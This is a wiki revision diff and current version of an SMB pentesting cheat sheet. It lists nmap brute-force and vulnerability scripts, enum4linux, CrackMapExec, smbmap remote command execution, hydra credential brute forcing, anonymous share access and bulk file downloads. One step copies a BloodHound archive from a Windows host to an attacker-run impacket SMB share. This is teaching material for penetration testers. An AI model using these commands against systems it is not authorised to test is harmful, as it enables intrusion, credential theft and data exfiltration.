SMB: Difference between revisions

From RCATs
(trying to make pretty)
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:


SMB (Server Message Block) Pentesting
==Description ==
SMB stands for Server Message Block. Default ports are 445, 139.


Last modified: 2022-12-21
Ok what does it do? Glad you asked.
Active Directory Windows
It allows clients, like workstations, to communicate with a server like a share directory.


It allows clients, like workstations, to communicate with a server like a share directory. Samba is derived from SMB for linux. Default ports are 139, 445.
==Enumeration==
Enumeration
=== Nmap ===
Automatic enumeration can be done with [[Nmap]] like so. Pay attention here the port may be different but no all the time and of course the ip will be different.


To enumerate automatically, you can use nmap.
<syntaxhighlight lang="bash">


'''nmap --script smb-brute -p 445 <target-ip>'''
nmap --script smb-brute -p 445 <target-ip>


nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>
nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>
Line 20: Line 22:
nmap --script smb-vuln* -p 445 <target-ip>
nmap --script smb-vuln* -p 445 <target-ip>


Enum4linux
</syntaxhighlight>


Enum4linux enumerates the users, share directories, etc.
=== Enum4Linux ===
[[Enum4Linux]] enumerates the users, share directories, etc.
<syntaxhighlight lang="bash">
enum4linux <target-ip>    #  Basic use.


#Basic
enum4linux -a <target-ip> # All Enum.
enum4linux <target-ip>


#All enumeration
enum4linux -v <target-ip> # Verbose.
enum4linux -a <target-ip>


#Verbose
#Specify username and password this can get us even more information as we will have accessed that users share.
enum4linux -v <target-ip>
enum4linux -u username -p password <target-ip>
</syntaxhighlight>


#Specify username and password
=== CrackMapExec ===
enum4linux -u username -p password <target-ip>
[[CrackMapExec]] enumerates the users, share directories, etc.
<syntaxhighlight lang="powershell">
# Enumerate shares with credentials
crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --shares


Smbmap
# Enumerate shares anonymously
crackmapexec smb 10.10.10.10 -u 'a' -p '' --shares


</syntaxhighlight>
=== SMB Map ===
<syntaxhighlight lang="bash">
smbmap -H <target-ip>
smbmap -H <target-ip>


#Recursive
smbmap -H <target-ip> -R # Recursive lookup.
smbmap -H <target-ip> -R


#Username and password
# Username and Password
smbmap -u username -p password -H <target-ip>
smbmap -u username -p password -H <target-ip>


#Execute a command
# Execute a command
smbmap -u username -p password -H <target-ip> -x 'ipconfig'
smbmap -u username -p password -H <target-ip> -x 'ipconfig'
</syntaxhighlight>
=== SMBClient ===


Connect with smbclient
<syntaxhighlight lang="bash">
smbclient -L 10.0.0.1


Brute Force Credentials
smbclient -N -L 10.0.0.1
 
hydra -l username -P passwords.txt <target-ip> smb
hydra -L usernames.txt -p password <target-ip> smb


smbclient -N -L \\\\10.0.0.1


Connect
You can use smbclient to connect the target.
smbclient -L 10.0.0.1
smbclient -N -L 10.0.0.1
smbclient -N -L \\\\10.0.0.1
smbclient -L 10.0.0.1 -U username
smbclient -L 10.0.0.1 -U username


#anonymous
smbclient //10.0.0.1/somedir -N
smbclient //10.0.0.1/somedir -N
#with space use the "" double quotes
smbclient "//10.0.0.1/some dir" -N


#Specify shared directory
# use of ""
smbclient //10.0.0.1/somedir -U username
smbclient "//10.0.0.1/some dir" -N                      
#nobody, no-pass
smbclient //10.0.0.1/somedir -N -U nobody


#Specify workgroup
# Specify shared directory
smbclient -L 10.0.0.1 -W WORKGROUP -U username
smbclient //10.0.0.1/somedir -U username      


# Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username           
</syntaxhighlight>


Commands in SMB
== Brute Force ==
 
=== Brute Force Credentials ===
After connecting, you can find the sensitive files or information.
[[Hydra]]
 
<syntaxhighlight lang="bash">
#List files
hydra -l username -P passwords.txt <target-ip> smb
smb> ls
 
#Download a file
smb> get sample.txt
 
To download files recursively, run the following commands.
 
smb> mask ""
smb> recurse ON
smb> prompt OFF
smb> mget *
 
Or using smbget from local machine.
 
smbget -R smb://<target-ip>/somedir -U username
 
#Specify workgroup
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username
 
#as anonymous user
smbget smb://<target-ip>/somedir -U anonymous
password: anonymous
 
 
transfer a file from windows to my attacker machine.
----------------------------------------------------------------------
In my kali machine
 
mk dir smb
 
sudo impacket-smbserver -smb2support share $(pwd)
 
powershell copy bloodhound.zip \\attackip\share\ 
 
 
 
 
18.4.11.A. SMB Pentesting
 
SMB stands for Server Message Block. Default ports are 445, 139.
Ok what does it do? Glad you asked.
It allows clients, like workstations, to communicate with a server like a share directory.
SMB Enumeration
Auto enum can be done with nmap like so. Pay attention here the port may be different but no all the time and of course the ip will be different.
 
nmap --script smb-brute -p 445 <target-ip>
nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>
nmap --script smb-enum* -p 445 <target-ip>
nmap --script smb-protocols -p 445 <target-ip>
nmap --script smb-vuln* -p 445 <target-ip>
Enum4Linux enumerates the users, share directories, etc.
enum4linux <target-ip>    #  Basic use.
enum4linux -a <target-ip> # All Enum.
enum4linux -v <target-ip> # Verbose.
enum4linux -u username -p password <target-ip> #Specify username and password this can get us even more information as we will have accessed that users share.
Smbmap
smbmap -H <target-ip>
smbmap -H <target-ip> -R # Recursive lookup.
smbmap -u username -p password -H <target-ip> # Username and Password
smbmap -u username -p password -H <target-ip> -x 'ipconfig' # Execute a command


Brute Force Credentials
hydra -l username -P passwords.txt <target-ip> smb
hydra -L usernames.txt -p password <target-ip> smb
hydra -L usernames.txt -p password <target-ip> smb
</syntaxhighlight>


Connect with smbclient
== Basic Commands ==
 
smbclient -L 10.0.0.1
smbclient -N -L 10.0.0.1
smbclient -N -L \\\\10.0.0.1
smbclient -L 10.0.0.1 -U username
 
Anonymous
smbclient //10.0.0.1/somedir -N
 
With a space in the dir we “”
smbclient "//10.0.0.1/some dir" -N
 
Specify shared directory
smbclient //10.0.0.1/somedir -U username
 
Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username
 
 
 
 
                                                                  '''Commands in SMB'''
 
Once Connected we can find sensitive files or information and we love that as hackers dont we.
Once Connected we can find sensitive files or information and we love that as hackers dont we.
 
<syntaxhighlight lang="bash">
List Files
#List Files
 
smb> ls
smb> ls


Download a file
# Download a file
 
smb> get sample.txt
smb> get sample.txt


Put a file can be txt,pdf,php etc..
# Put a file can be txt,pdf,php etc..
 
smb> put sample.txt
smb> put sample.txt


Download files recursively
# Download files recursively below
smb> mask ""
smb> mask ""
smb> recurse ON
smb> recurse ON
Line 193: Line 111:
smb> mget *
smb> mget *


We can use smbget from our local machine as well
# We can use smbget from our local machine as well
 
smbget -R smb://<target-ip>/somedir -U username      
smbget -R smb://<target-ip>/somedir -U username
 
          Specify workgroup


# Specify work group
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username


        as anonymous user
# As anonymous user
smbget smb://<target-ip>/somedir -U anonymous  password: anonymous


smbget smb://<target-ip>/somedir -U anonymous
# Transfer a file from windows to my attacker machine
password: anonymous
# In your local kali make a directory that you want that file to go into.
mk dir smb


Transfer a file from windows to my attacker machine
# Next we will run impacket-smbserver
In your local kali make a directory that you want that file to go into.
sudo impacket-smbserver -smb2support share $(pwd)


mk dir smb
#Then we will transfer the file over to that share we just set up with impacket-smbserver.
powershell copy bloodhound.zip \\attackip\share\


Next we will run impacket-smbserver
# I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.
 
sudo impacket-smbserver -smb2support share $(pwd)
 
Then we will transfer the file over to that share we just set up with impacket-smbserver.
 
powershell copy bloodhound.zip \\attackip\share\


I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.
smbclient -N -L //<FQDN/IP> Null session authentication on SMB.
smbclient //<FQDN/IP>/<share> Connect to a specific SMB share.
rpcclient -U "" <FQDN/IP> Interaction with the target using RPC.
samrdump.py <FQDN/IP> Username enumeration using Impacket scripts.
smbmap -H <FQDN/IP> Enumerating SMB shares.
crackmapexec smb <FQDN/IP> --shares -u '' -p '' Enumerating SMB shares using null session authentication.
enum4linux-ng.py <FQDN/IP> -A SMB enumeration using enum4linux.
</syntaxhighlight>

Latest revision as of 12:37, 8 July 2023

Description

SMB stands for Server Message Block. Default ports are 445, 139.

Ok what does it do? Glad you asked. It allows clients, like workstations, to communicate with a server like a share directory.

Enumeration

Nmap

Automatic enumeration can be done with Nmap like so. Pay attention here the port may be different but no all the time and of course the ip will be different.

nmap --script smb-brute -p 445 <target-ip>

nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>

nmap --script smb-enum* -p 445 <target-ip>

nmap --script smb-protocols -p 445 <target-ip>

nmap --script smb-vuln* -p 445 <target-ip>

Enum4Linux

Enum4Linux enumerates the users, share directories, etc.

enum4linux <target-ip>    #  Basic use.

enum4linux -a <target-ip>	# All Enum.

enum4linux -v <target-ip>	# Verbose.

#Specify username and password this can get us even more information as we will have accessed that users share.
enum4linux -u username -p password <target-ip>

CrackMapExec

CrackMapExec enumerates the users, share directories, etc.

# Enumerate shares with credentials
crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --shares

# Enumerate shares anonymously
crackmapexec smb 10.10.10.10 -u 'a' -p '' --shares

SMB Map

smbmap -H <target-ip>

smbmap -H <target-ip> -R	# Recursive lookup.

# Username and Password 
smbmap -u username -p password -H <target-ip>	

# Execute a command
smbmap -u username -p password -H <target-ip> -x 'ipconfig'

SMBClient

Connect with smbclient

smbclient -L 10.0.0.1

smbclient -N -L 10.0.0.1

smbclient -N -L \\\\10.0.0.1

smbclient -L 10.0.0.1 -U username

smbclient //10.0.0.1/somedir -N

# use of "" 
smbclient "//10.0.0.1/some dir" -N                       

# Specify shared directory
smbclient //10.0.0.1/somedir -U username        

# Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username

Brute Force

Brute Force Credentials

Hydra

hydra -l username -P passwords.txt <target-ip> smb

hydra -L usernames.txt -p password <target-ip> smb

Basic Commands

Once Connected we can find sensitive files or information and we love that as hackers dont we.

#List Files
smb> ls

# Download a file
smb> get sample.txt

# Put a file can be txt,pdf,php etc..
smb> put sample.txt

# Download files recursively below
smb> mask ""
smb> recurse ON
smb> prompt OFF
smb> mget *

# We can use smbget from our local machine as well
smbget -R smb://<target-ip>/somedir -U username        

# Specify work group
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username

# As anonymous user
smbget smb://<target-ip>/somedir -U anonymous  password: anonymous

# Transfer a file from windows to my attacker machine
# In your local kali make a directory that you want that file to go into.
mk dir smb

# Next we will run impacket-smbserver
sudo impacket-smbserver -smb2support share $(pwd)

#Then we will transfer the file over to that share we just set up with impacket-smbserver.
powershell copy bloodhound.zip \\attackip\share\

# I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.

smbclient -N -L //<FQDN/IP>	Null session authentication on SMB.
smbclient //<FQDN/IP>/<share>	Connect to a specific SMB share.
rpcclient -U "" <FQDN/IP>	Interaction with the target using RPC.
samrdump.py <FQDN/IP>	Username enumeration using Impacket scripts.
smbmap -H <FQDN/IP>	Enumerating SMB shares.
crackmapexec smb <FQDN/IP> --shares -u '' -p ''	Enumerating SMB shares using null session authentication.
enum4linux-ng.py <FQDN/IP> -A	SMB enumeration using enum4linux.